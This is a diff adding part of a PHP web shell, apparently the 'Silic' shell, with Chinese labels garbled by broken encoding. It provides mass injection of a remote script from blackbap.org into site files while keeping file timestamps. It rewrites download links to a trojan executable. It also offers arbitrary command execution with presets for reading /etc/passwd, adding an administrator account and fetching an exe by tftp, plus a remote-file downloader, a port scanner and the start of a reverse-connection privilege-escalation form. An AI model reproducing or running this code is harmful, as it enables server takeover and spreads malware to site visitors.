+<input type="radio" name="gi" value="b">�����ļ����<input type="radio" name="gi" value="c"> �����ļ���ĩβ</div>
+<div class="actall" style="height:30px;"><input type="checkbox" name="gx" value="1" checked>���ܹ����ظ����� <input type="checkbox" name="gd" value="1" checked>�����ļ��޸�ʱ�䲻��</div>
+<div class="actall" style="height:50px;"><input type="radio" name="gb" value="a" checked>������Ӧ���ڸ��ļ���,���ļ��к��ļ�<br><input type="radio" name="gb" value="b">��������Ӧ���ڸ��ļ���</div>
+<div class="actall"><input type="button" value="��ʼ����" style="width:80px;height:26px;" onclick="autorun();"></div>
+</form>
+END;
+return true;
+}
+//��������
+function Qingma_Auto($qp,$qt,$qc,$qd,$qb)
+{
+	if(($h_d = @opendir($qp)) == NULL) return false;
+	while(false !== ($Filename = @readdir($h_d)))
+	{
+		if($Filename == '.' || $Filename == '..') continue;
+		$Filepath = File_Str($qp.'/'.$Filename);
+		if(is_dir($Filepath) && $qb) Qingma_Auto($Filepath,$qt,$qc,$qd,$qb);
+		if(eregi($qt,$Filename))
+		{
+			$ic = File_Read($Filepath);
+			if(!stristr($ic,$qc)) continue;
+			$ic = str_replace($qc,'',$ic);
+			if($qd) $ftime = @filemtime($Filepath);
+			echo File_Write($Filepath,$ic,'wb') ? '<font color="#006600">�ɹ�:</font>'.$Filepath.' <br>'."\r\n" : '<font color="#FF0000">ʧ��:</font>'.$Filepath.' <br>'."\r\n";
+			if($qd) @touch($Filepath,$ftime);
+			ob_flush();
+			flush();
+		}
+	}
+	@closedir($h_d);
+	return true;
+}
+function Qingma_c()
+{
+	if((!empty($_POST['qp'])) && (!empty($_POST['qt'])) && (!empty($_POST['qc'])))
+	{
+		echo '<div class="actall">';
+		$qt = str_replace('.','\\.',$_POST['qt']);
+		$qd = isset($_POST['qd']) ? true : false;
+		$qb = ($_POST['qb'] == 'a') ? true : false;
+		echo Qingma_Auto($_POST['qp'],$qt,$_POST['qc'],$qd,$qb) ? '<a href="#" onclick="history.back();">�������</a>' : '<a href="#" onclick="history.back();">�쳣��ֹ</a>';
+		echo '</div>';
+		return false;
+	}
+	$FILE_DIR = File_Str(dirname(__FILE__));
+	$ROOT_DIR = File_Mode();
+print<<<END
+<script language="javascript">
+function Fullll(i){
+	if(i==0) return false;
+  Str = new Array(5);
+  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";xform.qp.value = Str[i];}
+	else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";xform.qt.value = Str[i];}
+  return true;
+}
+function autoup(){
+	if(document.getElementById('qp').value == ''){alert('·������Ϊ��');return false;}
+	if(document.getElementById('qt').value == ''){alert('���Ͳ���Ϊ��');return false;}
+	if(document.getElementById('qc').value == ''){alert('���벻��Ϊ��');return false;}
+	document.getElementById('xform').submit();
+}
+</script>
+<form method="POST" name="xform" id="xform" action="?s=c">
+<div class="actall" style="height:35px;">����·�� <input type="text" name="qp" id="qp" value="{$ROOT_DIR}" style="width:500px;">
+<select onchange='return Fullll(options[selectedIndex].value)'>
+<option value="0" selected>--��Χѡ��--</option>
+<option value="1">��վ��Ŀ¼</option>
+<option value="2">������Ŀ¼</option>
+</select></div>
+<div class="actall" style="height:35px;">�ļ����� <input type="text" name="qt" id="qt" value=".htm|.html|.shtml|.asp|.aspx|.php" style="width:500px;">
+<select onchange='return Fullll(options[selectedIndex].value)'>
+<option value="0" selected>--����ѡ��--</option>
+<option value="3">��̬�ļ�</option>
+<option value="4">�ű�+��̬</option>
+<option value="5">JS�ļ�</option>
+</select></div>
+<div class="actall">������� <textarea name="qc" id="qc" style="width:610px;height:180px;">&lt;script language=javascript src="http://blackbap.org/ad.js"&gt;&lt;/script&gt;</textarea></div>
+<div class="actall" style="height:30px;"><input type="checkbox" name="qd" value="1" checked>�����ļ��޸�ʱ�䲻��</div>
+<div class="actall" style="height:50px;"><input type="radio" name="qb" value="a" checked>������Ӧ���ڸ��ļ���,���ļ��к��ļ�
+<br><input type="radio" name="qb" value="b">��������Ӧ���ڸ��ļ���</div>
+<div class="actall"><input type="button" value="��ʼ����" style="width:80px;height:26px;" onclick="autoup();"></div>
+</form>
+END;
+	return true;
+}
+//�����滻
+function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb)
+{
+	if(($h_d = @opendir($tp)) == NULL) return false;
+	while(false !== ($Filename = @readdir($h_d)))
+	{
+		if($Filename == '.' || $Filename == '..') continue;
+		$Filepath = File_Str($tp.'/'.$Filename);
+		if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb);
+		$doing = false;
+		if(eregi($tt,$Filename))
+		{
+			$ic = File_Read($Filepath);
+			if($th)
+			{
+				if(!stristr($ic,$tca)) continue;
+				$ic = str_replace($tca,$tcb,$ic);
+				$doing = true;
+			}
+			else
+			{
+				preg_match_all("/href\=\"([^~]*?)\"/i",$ic,$nc);
+				for($i = 0;$i < count($nc[1]);$i++){if(eregi($tca,$nc[1][$i])){$ic = str_replace($nc[1][$i],$tcb,$ic);$doing = true;}}
+			}
+			if($td) $ftime = @filemtime($Filepath);
+			if($doing) echo File_Write($Filepath,$ic,'wb') ? '<font color="#006600">�ɹ�:</font>'.$Filepath.' <br>'."\r\n" : '<font color="#FF0000">ʧ��:</font>'.$Filepath.' <br>'."\r\n";
+			if($td) @touch($Filepath,$ftime);
+			ob_flush();
+			flush();
+		}
+	}
+	@closedir($h_d);
+	return true;
+}
+function Tihuan_d()
+{
+	if((!empty($_POST['tp'])) && (!empty($_POST['tt'])))
+	{
+		echo '<div class="actall">';
+		$tt = str_replace('.','\\.',$_POST['tt']);
+		$td = isset($_POST['td']) ? true : false;
+		$tb = ($_POST['tb'] == 'a') ? true : false;
+		$th = ($_POST['th'] == 'a') ? true : false;
+		if($th) $_POST['tca'] = str_replace('.','\\.',$_POST['tca']);
+		echo Tihuan_Auto($_POST['tp'],$tt,$th,$_POST['tca'],$_POST['tcb'],$td,$tb) ? '<a href="#" onclick="window.location=\'?s=d\'">�滻���</a>' : '<a href="#" onclick="window.location=\'?s=d\'">�쳣��ֹ</a>';
+		echo '</div>';
+		return false;
+	}
+	$FILE_DIR = File_Str(dirname(__FILE__));
+	$ROOT_DIR = File_Mode();
+print<<<END
+<script language="javascript">
+function Fulllll(i){
+	if(i==0) return false;
+  Str = new Array(5);
+  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";tform.tp.value = Str[i];}
+	else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";tform.tt.value = Str[i];}
+  return true;
+}
+function showth(th){
+	if(th == 'a') document.getElementById('setauto').innerHTML = '��������:<textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>�滻��Ϊ:<textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea>';
+	if(th == 'b') document.getElementById('setauto').innerHTML = '<br>���غ�׺ <input type="text" name="tca" id="tca" value=".exe|.7z|.rar|.zip|.gz|.txt" style="width:500px;"><br><br>�滻��Ϊ <input type="text" name="tcb" id="tcb" value="http://blackbap.org/muma.exe" style="width:500px;">';
+	return true;
+}
+function autoup(){
+	if(document.getElementById('tp').value == ''){alert('·������Ϊ��');return false;}
+	if(document.getElementById('tt').value == ''){alert('���Ͳ���Ϊ��');return false;}
+	if(document.getElementById('tca').value == ''){alert('���벻��Ϊ��');return false;}
+	document.getElementById('tform').submit();
+}
+</script>
+<form method="POST" name="tform" id="tform" action="?s=d">
+<div class="actall" style="height:35px;">�滻·�� <input type="text" name="tp" id="tp" value="{$ROOT_DIR}" style="width:500px;">
+<select onchange='return Fulllll(options[selectedIndex].value)'>
+<option value="0" selected>--��Χѡ��--</option>
+<option value="1">��վ��Ŀ¼</option>
+<option value="2">������Ŀ¼</option>
+</select></div>
+<div class="actall" style="height:35px;">�ļ����� <input type="text" name="tt" id="tt" value=".htm|.html|.shtml" style="width:500px;">
+<select onchange='return Fulllll(options[selectedIndex].value)'>
+<option value="0" selected>--����ѡ��--</option>
+<option value="3">��̬�ļ�</option>
+<option value="4">�ű�+��̬</option>
+<option value="5">JS�ļ�</option>
+</select></div>
+<div class="actall" style="height:235px;"><input type="radio" name="th" value="a" onclick="showth('a')" checked>�滻�ļ��е�ָ������ <input type="radio" name="th" value="b" onclick="showth('b')">�滻�ļ��е����ص�ַ<br>
+<div id="setauto">�������� <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>�滻��Ϊ <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea></div></div>
+<div class="actall" style="height:30px;"><input type="checkbox" name="td" value="1" checked>�����ļ��޸�ʱ�䲻��</div>
+<div class="actall" style="height:50px;"><input type="radio" name="tb" value="a" checked>���滻Ӧ���ڸ��ļ���,���ļ��к��ļ�
+<br><input type="radio" name="tb" value="b">�����滻Ӧ���ڸ��ļ���</div>
+<div class="actall"><input type="button" value="��ʼ�滻" style="width:80px;height:26px;" onclick="autoup();"></div>
+</form>
+END;
+return true;
+}
+//ɨ��ľ��
+function Antivirus_Auto($sp,$features,$st,$sb)
+{
+	if(($h_d = @opendir($sp)) == NULL) return false;
+	$ROOT_DIR = File_Mode();
+	while(false !== ($Filename = @readdir($h_d)))
+	{
+		if($Filename == '.' || $Filename == '..') continue;
+		$Filepath = File_Str($sp.'/'.$Filename);
+		if(is_dir($Filepath) && $sb) Antivirus_Auto($Filepath,$features,$st);
+		if(eregi($st,$Filename))
+		{
+			if($Filepath == File_Str(__FILE__)) continue;
+			$ic = File_Read($Filepath);
+			foreach($features as $var => $key)
+			{
+				if(stristr($ic,$key))
+				{
+					$Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath);
+					$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
+					echo ' <a href="'.$Fileurls.'" target="_blank"> <font color="#8B0000"> '.$Filepath.' </font> </a> <br> ��<a href="?s=e&fp='.urlencode($sp).'&fn='.$Filename.'&dim='.urlencode($key).'" target="_blank"> �༭ </a> <a href="?s=e&df='.urlencode($Filepath).'" target="_blank"> ɾ�� </a> �� ';
+					echo ' �� '.$Filetime.' �� <font color="#FF0000"> '.$var.' </font> <br> <br> '."\r\n";
+					break;
+				}
+			}
+			ob_flush();
+			flush();
+		}
+	}
+	@closedir($h_d);
+	return true;
+}
+
+function Antivirus_e()
+{
+	if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo 'ɾ���ɹ�';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? 'ɾ���ɹ�' : 'ɾ��ʧ��';} return false;}
+	if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }
+	$SCAN_DIR = isset($_POST['sp']) ? $_POST['sp'] : File_Mode();
+	$features_php = array('evalһ�仰����'=>'eval(','����read����'=>'->read()','����readdir����3'=>'readdir(','MYSQL�Զ��庯�����'=>'returns string soname','��������1'=>'eval(gzinflate(','��������2'=>'eval(base64_decode(','��������3'=>'base64_decode(','evalһ�仰2'=>'eval (','php��������'=>'copy($_FILES','��������2'=>'copy ($_FILES','�ϴ�����'=>'move_uploaded_file($_FILES','�ϴ�����2'=>'move_uploaded_file ($_FILES','С������'=>'str_replace(\'\\\\\',\'/\',');
+	$features_asx = array('�ű�����'=>'VBScript.Encode','��������'=>'#@~^','fso���'=>'fso.createtextfile(path,true)','excuteһ�仰'=>'execute','evalһ�仰'=>'eval','wscript����'=>'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B','���ݿ��������'=>'13709620-C279-11CE-A49E-444553540000','wscript����'=>'WScript.Shell','fso����'=>'0D43FE01-F093-11CF-8940-00A0C9054228','ʮ������'=>'���','aspx��������'=>'Process.GetProcesses','aspxһ�仰'=>'Request.BinaryRead');
+print<<<END
+<form method="POST" name="tform" id="tform" action="?s=e">
+<div class="actall">ɨ��·�� <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:600px;"></div>
+<div class="actall">ľ������ <input type="checkbox" name="stphp" value="php" checked>phpľ�� 
+<input type="checkbox" name="stasx" value="asx">asp+aspxľ��</div>
+<div class="actall" style="height:50px;"><input type="radio" name="sb" value="a" checked>��ɨ��Ӧ���ڸ��ļ���,���ļ��к��ļ�
+<br><input type="radio" name="sb" value="b">����ɨ��Ӧ���ڸ��ļ���</div>
+<div class="actall"><input type="submit" value="��ʼɨ��" style="width:80px;"></div>
+</form>
+END;
+if(!empty($_POST['sp']))
+{
+	echo '<div class="actall">';
+	if(isset($_POST['stphp'])){$features_all = $features_php; $st = '\.php|\.inc|\;';}
+	if(isset($_POST['stasx'])){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}
+	if(isset($_POST['stphp']) && isset($_POST['stasx'])){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';}
+	$sb = ($_POST['sb'] == 'a') ? true : false;
+	echo Antivirus_Auto($_POST['sp'],$features_all,$st,$sb) ? 'ɨ�����' :  '�쳣��ֹ';
+	echo '</div>';
+}
+return true;
+}
+//�����ļ�
+function Findfile_Auto($sfp,$sfc,$sft,$sff,$sfb)
+{
+	//echo $sfp.'<br>'.$sfc.'<br>'.$sft.'<br>'.$sff.'<br>'.$sfb;
+	if(($h_d = @opendir($sfp)) == NULL) return false;
+	while(false !== ($Filename = @readdir($h_d)))
+	{
+		if($Filename == '.' || $Filename == '..') continue;
+		if(eregi($sft,$Filename)) continue;
+		$Filepath = File_Str($sfp.'/'.$Filename);
+		if(is_dir($Filepath) && $sfb) Findfile_Auto($Filepath,$sfc,$sft,$sff,$sfb);
+		if($sff)
+		{
+			if(stristr($Filename,$sfc))
+			{
+				echo '<a target="_blank" href="?s=p&fp='.urlencode($sfp).'&fn='.urlencode($Filename).'"> '.$Filepath.' </a><br>'."\r\n";
+				ob_flush();
+				flush();
+			}
+		}
+		else
+		{
+			$File_code = File_Read($Filepath);
+			if(stristr($File_code,$sfc))
+			{
+				echo '<a target="_blank" href="?s=p&fp='.urlencode($sfp).'&fn='.urlencode($Filename).'"> '.$Filepath.' </a><br>'."\r\n";
+				ob_flush();
+				flush();
+			}
+		}
+	}
+	@closedir($h_d);
+	return true;
+}
+function Findfile_j()
+{
+	if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo 'ɾ���ɹ�';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? 'ɾ���ɹ�' : 'ɾ��ʧ��';} return false;}
+	if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }
+	$SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode();
+	$SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config';
+	$SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip';
+print<<<END
+<form method="POST" name="jform" id="jform" action="?s=j">
+<div class="actall">ɨ��·�� <input type="text" name="sfp" value="{$SCAN_DIR}" style="width:600px;"></div>
+<div class="actall">�����ļ� <input type="text" name="sft" value="{$SCAN_TYPE}" style="width:600px;"></div>
+<div class="actall">�ؼ��ִ� <input type="text" name="sfc" value="{$SCAN_CODE}" style="width:395px;">
+<input type="radio" name="sff" value="a" checked>�����ļ��� 
+<input type="radio" name="sff" value="b">������������</div>
+<div class="actall" style="height:50px;"><input type="radio" name="sfb" value="a" checked>������Ӧ���ڸ��ļ���,���ļ��к��ļ�
+<br><input type="radio" name="sfb" value="b">��������Ӧ���ڸ��ļ���</div>
+<div class="actall"><input type="submit" value="��ʼɨ��" style="width:80px;"></div>
+</form>
+END;
+	if((!empty($_POST['sfp'])) && (!empty($_POST['sfc'])))
+	{
+		echo '<div class="actall">';
+		$_POST['sft'] = str_replace('.','\\.',$_POST['sft']);
+		$sff = ($_POST['sff'] == 'a') ? true : false;
+		$sfb = ($_POST['sfb'] == 'a') ? true : false;
+		echo Findfile_Auto($_POST['sfp'],$_POST['sfc'],$_POST['sft'],$sff,$sfb) ? '�������' : '�쳣��ֹ';
+		echo '</div>';
+	}
+	return true;
+}
+//ϵͳ��Ϣ
+function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
+function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
+function Info_f()
+{
+	$dis_func = get_cfg_var("disable_functions");
+	$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "�������ϴ�";
+	$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
+	if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
+	$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
+	$info = array(
+		array("������ʱ��",date("Y��m��d�� h:i:s",time())),
+		array("����������","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
+		array("������IP��ַ",gethostbyname($_SERVER['SERVER_NAME'])),
+		array("����������ϵͳ",PHP_OS),
+		array("����������ϵͳ���ֱ���",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		array("��������������",$_SERVER['SERVER_SOFTWARE']),
+		array("���IP",getenv('REMOTE_ADDR')),
+		array("Web����˿�",$_SERVER['SERVER_PORT']),
+		array("PHP���з�ʽ",strtoupper(php_sapi_name())),
+		array("PHP�汾",PHP_VERSION),
+		array("�����ڰ�ȫģʽ",Info_Cfg("safemode")),
+		array("����������Ա",$adminmail),
+		array("���ļ�·��",__FILE__),
+		array("����ʹ�� URL ���ļ� allow_url_fopen",Info_Cfg("allow_url_fopen")),
+		array("������̬�������ӿ� enable_dl",Info_Cfg("enable_dl")),
+		array("��ʾ������Ϣ display_errors",Info_Cfg("display_errors")),
+		array("�Զ�����ȫ�ֱ��� register_globals",Info_Cfg("register_globals")),
+		array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
+		array("�����������ʹ���ڴ��� memory_limit",Info_Cfg("memory_limit")),
+		array("POST����ֽ��� post_max_size",Info_Cfg("post_max_size")),
+		array("��������ϴ��ļ� upload_max_filesize",$upsize),
+		array("���������ʱ�� max_execution_time",Info_Cfg("max_execution_time")."��"),
+		array("�����õĺ��� disable_functions",$dis_func),
+		array("phpinfo()",$phpinfo),
+		array("Ŀǰ���п���ռ�diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
+		array("ͼ�δ��� GD Library",Info_Fun("imageline")),
+		array("IMAP�����ʼ�ϵͳ",Info_Fun("imap_close")),
+		array("MySQL���ݿ�",Info_Fun("mysql_close")),
+		array("SyBase���ݿ�",Info_Fun("sybase_close")),
+		array("Oracle���ݿ�",Info_Fun("ora_close")),
+		array("Oracle 8 ���ݿ�",Info_Fun("OCILogOff")),
+		array("PREL�����﷨ PCRE",Info_Fun("preg_match")),
+		array("PDF�ĵ�֧��",Info_Fun("pdf_close")),
+		array("Postgre SQL���ݿ�",Info_Fun("pg_close")),
+		array("SNMP���������",Info_Fun("snmpget")),
+		array("ѹ���ļ�֧��(Zlib)",Info_Fun("gzclose")),
+		array("XML����",Info_Fun("xml_set_object")),
+		array("FTP",Info_Fun("ftp_login")),
+		array("ODBC���ݿ�����",Info_Fun("odbc_close")),
+		array("Session֧��",Info_Fun("session_start")),
+		array("Socket֧��",Info_Fun("fsockopen")),
+	);
+	echo '<table width="100%" border="0">';
+	for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
+	echo '</table>';
+	return true;
+}
+//ִ������
+function Exec_Run($cmd)
+{
+	$res = '';
+	if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}
+	elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
+	elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
+	elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
+	elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
+	return $res;
+}
+function Exec_g()
+{
+	$res = '����';
+	$cmd = 'dir';
+	if(!empty($_POST['cmd'])){$res = Exec_Run($_POST['cmd']);$cmd = $_POST['cmd'];}
+print<<<END
+<script language="javascript">
+function sFull(i){
+	Str = new Array(14);
+	Str[0] = "dir";
+	Str[1] = "ls /etc";
+	Str[2] = "cat /etc/passwd";
+	Str[3] = "cp -a /home/www/html/a.php /home/www2/";
+	Str[4] = "uname -a";
+	Str[5] = "gcc -o /tmp/silic /tmp/silic.c";
+	Str[6] = "net user silic silic /add & net localgroup administrators silic /add";
+	Str[7] = "net user";
+	Str[8] = "netstat -an";
+	Str[9] = "ipconfig";
+	Str[10] = "copy c:\\1.php d:\\2.php";
+	Str[11] = "tftp -i 123.234.222.1 get silic.exe c:\\silic.exe";
+	Str[12] = "lsb_release -a";
+	Str[13] = "chmod 777 /tmp/silic.c";
+document.getElementById('cmd').value = Str[i];
+return true;
+}
+</script>
+<form method="POST" name="gform" id="gform" action="?s=g"><center><div class="actall">
+������� <input type="text" name="cmd" id="cmd" value="{$cmd}" style="width:399px;">
+<select onchange='return sFull(options[selectedIndex].value)'>
+<option value="0" selected>--�����--</option>
+<option value="1">�ļ��б�</option>
+<option value="2">��ȡ����</option>
+<option value="3">�����ļ�</option>
+<option value="4">ϵͳ��Ϣ</option>
+<option value="5">�����ļ�</option>
+<option value="6">���ӹ���</option>
+<option value="7">�û��б�</option>
+<option value="8">�鿴�˿�</option>
+<option value="9">�鿴��ַ</option>
+<option value="10">�����ļ�</option>
+<option value="11">FTP����</option>
+<option value="12">�ں˰汾</option>
+<option value="13">��������</option>
+</select>
+<input type="submit" value="ִ��" style="width:80px;"></div>
+<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center></form>
+END;
+return true;
+}
+//����ӿ�
+function Com_h()
+{
+$object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
+print<<<END
+<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> 
+<a href="?s=h&o=wscript">[WScript.shell]</a> 
+<a href="?s=h&o=application">[Shell.Application]</a> 
+<a href="?s=h&o=downloader">[Downloader]</a></div>
+<form method="POST" name="hform" id="hform" action="?s=h&o={$object}">
+END;
+if($object == 'downloader')
+{
+	$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://blackbap.org/a.exe';
+	$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__).'/a.exe');
+print<<<END
+<div class="actall">������ <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
+<div class="actall">���ص� <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
+<div class="actall"><input value="����" type="submit" style="width:80px;"></div></form>
+END;
+	if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
+	{
+		echo '<div class="actall">';
+		$contents = @file_get_contents($_POST['durl']);
+		if(!$contents) echo '�޷���������';
+		else echo File_Write($_POST['dpath'],$contents,'wb') ? '���سɹ�' : '����ʧ��';
+		echo '</div>';
+	}
+}
+elseif($object == 'wscript')
+{
+	$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
+print<<<END
+<div class="actall">ִ��CMD���� <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
+<div class="actall"><input type="submit" value="ִ��" style="width:80px;"></div></form>
+END;
+	if(!empty($_POST['cmd']))
+	{
+		echo '<div class="actall">';
+		$shell = new COM('wscript');
+		$exe = @$shell->exec("cmd.exe /c ".$cmd);
+		$out = $exe->StdOut();
+		$output = $out->ReadAll();
+		echo '<pre>'.$output.'</pre>';
+		@$shell->Release();
+		$shell = NULL;
+		echo '</div>';
+	}
+}
+elseif($object == 'application')
+{
+	$run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
+	$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\boot.ini d:\a.txt';
+print<<<END
+<div class="actall">����·�� <input type="text" name="run" value="{$run}" style="width:600px;"></div>
+<div class="actall">������� <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
+<div class="actall"><input type="submit" value="ִ��" style="width:80px;"></div></form>
+END;
+	if(!empty($_POST['run']))
+	{
+		echo '<div class="actall">';
+		$shell = new COM('application');
+		echo (@$shell->ShellExecute($run,'/c '.$cmd) == '0') ? 'ִ�гɹ�' : 'ִ��ʧ��';
+		@$shell->Release();
+		$shell = NULL;
+		echo '</div>';
+	}
+}
+elseif($object == 'adodb')
+{
+	$string = isset($_POST['string']) ? $_POST['string'] : '';
+	$sql = isset($_POST['sql']) ? $_POST['sql'] : '';
+print<<<END
+<script language="javascript">
+function hFull(i){
+	if(i==0 || i==5) return false;
+	Str = new Array(12);  
+	Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb";
+	Str[2] = "Driver={Sql Server};Server=,1433;Database=DB;Uid=sa;Pwd=**";
+	Str[3] = "Driver={MySql};Server=;Port=3306;Database=DB;Uid=root;Pwd=**";
+	Str[4] = "Provider=MSDAORA.1;Password=����;User ID=�ʺ�;Data Source=������;Persist Security Info=True;";
+	Str[6] = "SELECT * FROM [TableName] WHERE ID<10";
+	Str[7] = "INSERT INTO [TableName](usr,psw) VALUES('yoco','pwd')";
+	Str[8] = "DELETE FROM [TableName] WHERE ID=1";
+	Str[9] = "UPDATE [TableName] SET USER='yoco' WHERE ID=1";
+	Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
+	Str[11] = "DROP TABLE [TableName]";
+	Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
+	Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
+	if(i<=4){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];}
+	return true;
+}
+</script>
+<div class="actall">�����ַ��� <input type="text" name="string" id="string" value="{$string}" style="width:526px;">
+<select onchange="return hFull(options[selectedIndex].value)">
+<option value="0" selected>--����ʾ��--</option>
+<option value="1">Access����</option>
+<option value="2">MsSql����</option>
+<option value="3">MySql����</option>
+<option value="4">Oracle����</option>
+<option value="5">--SQL�﷨--</option>
+<option value="6">��ʾ����</option>
+<option value="7">��������</option>
+<option value="8">ɾ������</option>
+<option value="9">�޸�����</option>
+<option value="10">�����ݱ�</option>
+<option value="11">ɾ���ݱ�</option>
+<option value="12">�����ֶ�</option>
+<option value="13">ɾ���ֶ�</option>
+</select></div>
+<div class="actall">SQL���� <input type="text" name="sql" id="sql" value="{$sql}" style="width:650px;"></div>
+<div class="actall"><input type="submit" value="ִ��" style="width:80px;"></div>
+</form>
+END;
+	if(!empty($string))
+	{
+		echo '<div class="actall">';
+		$shell = new COM('adodb');
+		@$shell->Open($string);
+		$result = @$shell->Execute($sql);
+		$count = $result->Fields->Count();
+		for($i = 0;$i < $count;$i++){$Field[$i] = $result->Fields($i);}
+		echo $result ? $sql.' ִ�гɹ�<br>' : $sql.' ִ��ʧ��<br>';
+		if(!empty($count)){while(!$result->EOF){for($i = 0;$i < $count;$i++){echo htmlspecialchars($Field[$i]->value).'<br>';}@$result->MoveNext();}}
+		$shell->Close();
+		@$shell->Release();
+		$shell = NULL;
+		echo '</div>';
+	}
+}
+	return true;
+}
+
+//ɨ��˿�
+function Port_i()
+{
+	$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
+	$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|22|23|25|80|110|135|139|445|1433|3306|3389|8000|43958';
+print<<<END
+<form method="POST" name="iform" id="iform" action="?s=i">
+<div class="actall">ɨ��IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
+<div class="actall">�˿ں� <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>
+<div class="actall"><input type="submit" value="ɨ��" style="width:80px;"></div>
+</form>
+END;
+	if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
+	{
+		echo '<div class="actall">';
+		$ports = explode('|', $_POST['port']);
+		for($i = 0;$i < count($ports);$i++)
+		{
+			$fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,2);
+			echo $fp ? '<font color="#FF0000">���Ŷ˿� ---> '.$ports[$i].'</font><br>' : '�رն˿� ---> '.$ports[$i].'<br>';
+			ob_flush();
+			flush();
+		}
+		echo '</div>';
+	}
+	return true;
+}
+
+//Linux��Ȩ
+function Linux_k()
+{
+	$yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR');
+	$yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666';
+print<<<END
+<form method="POST" name="kform" id="kform" action="?s=k">
+<div class="actall">��ĵ�ַ <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div>
+<div class="actall">���Ӷ˿� <input type="text" name="yourport" value="12666" style="width:400px"></div>
